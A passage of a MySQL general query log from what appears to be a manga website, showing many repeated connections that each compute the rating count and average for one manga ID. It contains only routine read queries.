count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330655944 Quit 330655945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330655945 Quit 330655946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330655946 Quit 330655947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330655947 Quit 330655948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330655948 Quit 330655949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330655949 Quit 330655950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330655950 Quit 330655951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330655951 Quit 330655952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330655952 Quit 330655953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330655953 Quit 330655954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330655954 Quit 330655955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330655955 Quit 330655956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330655956 Quit 330655957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330655957 Quit 330655958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330655958 Quit 330655959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330655959 Quit 330655960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330655960 Quit 330655961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330655961 Quit 330655962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330655962 Quit 330655963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330655963 Quit 330655964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330655964 Quit 330655965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330655965 Quit 330655966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330655966 Quit 330655967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330655967 Quit 330655968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330655968 Quit 330655969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330655969 Quit 330655970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330655970 Quit 330655971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330655971 Quit 330655972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330655972 Quit 330655973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330655973 Quit 330655974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330655974 Quit 330655975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330655975 Quit 330655976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330655976 Quit 330655977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330655977 Quit 330655978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330655978 Quit 330655979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330655979 Quit 330655980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330655980 Quit 330655981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330655981 Quit 330655982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330655982 Quit 330655983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330655983 Quit 330655984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330655984 Quit 330655985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330655985 Quit 330655986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330655986 Quit 330655987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330655987 Quit 330655988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330655988 Quit 330655989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330655989 Quit 330655990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330655990 Quit 330655991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330655991 Quit 330655992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330655992 Quit 330655993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330655993 Quit 330655994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330655994 Quit 330655995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330655995 Quit 330655996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330655996 Quit 330655997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330655997 Quit 330655998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330655998 Quit 330655999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330655999 Quit 330656000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330656000 Quit 330656001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330656001 Quit 330656002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330656002 Quit 330656003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330656003 Quit 330656004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330656004 Quit 330656005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330656005 Quit 330656006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330656006 Quit 330656007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330656007 Quit 330656008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330656008 Quit 330656009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330656009 Quit 330656010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330656010 Quit 330656011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330656011 Quit 330656012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330656012 Quit 330656013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330656013 Quit 330656014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330656014 Quit 330656015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330656015 Quit 330656016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330656016 Quit 330656017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330656017 Quit 330656018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330656018 Quit 330656019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330656019 Quit 330656020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330656020 Quit 330656021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330656021 Quit 330656022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330656022 Quit 330656023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330656023 Quit 330656024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330656024 Quit 330656025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330656025 Quit 330656026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330656026 Quit 330656027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330656027 Quit 330656028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330656028 Quit 330656029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330656029 Quit 330656030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330656030 Quit 330656031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330656031 Quit 330656032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330656032 Quit 330656033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330656033 Quit 330656034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330656034 Quit 330656035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330656035 Quit 330656036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330656036 Quit 330656037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330656037 Quit 330656038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330656038 Quit 330656039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330656039 Quit 330656040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330656040 Quit 330656041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330656041 Quit 330656042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330656042 Quit 330656043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330656043 Quit 330656044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330656044 Quit 330656045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330656045 Quit 330656046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330656046 Quit 330656047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330656047 Quit 330656048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330656048 Quit 330656049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330656049 Quit 330656050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330656050 Quit 330656051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330656051 Quit 330656052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330656052 Quit 330656053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330656053 Quit 330656054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330656054 Quit 330656055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330656055 Quit 330656056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330656056 Quit 330656057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330656057 Quit 330656058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330656058 Quit 330656059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330656059 Quit 330656060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330656060 Quit 330656061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330656061 Quit 330656062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330656062 Quit 330656063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330656063 Quit 330656064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330656064 Quit 330656065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330656065 Quit 330656066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330656066 Quit 330656067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330656067 Quit 330656068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330656068 Quit 330656069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330656069 Quit 330656070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330656070 Quit 330656071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330656071 Quit 330656072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330656072 Quit 330656073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330656073 Quit 330656074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330656074 Quit 330656075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330656075 Quit 330656076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330656076 Quit 330656077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330656077 Quit 330656078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330656078 Quit 330656079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330656079 Quit 330656080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330656080 Quit 330656081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330656081 Quit 330656082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330656082 Quit 330656083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330656083 Quit 330656084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330656084 Quit 330656085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330656085 Quit 330656086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330656086 Quit 330656087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330656087 Quit 330656088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330656088 Quit 330656089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330656089 Quit 330656090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330656090 Quit 330656091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330656091 Quit 330656092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330656092 Quit 330656093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330656093 Quit 330656094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330656094 Quit 330656095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330656095 Quit 330656096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330656096 Quit 330656097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330656097 Query select count(id) as 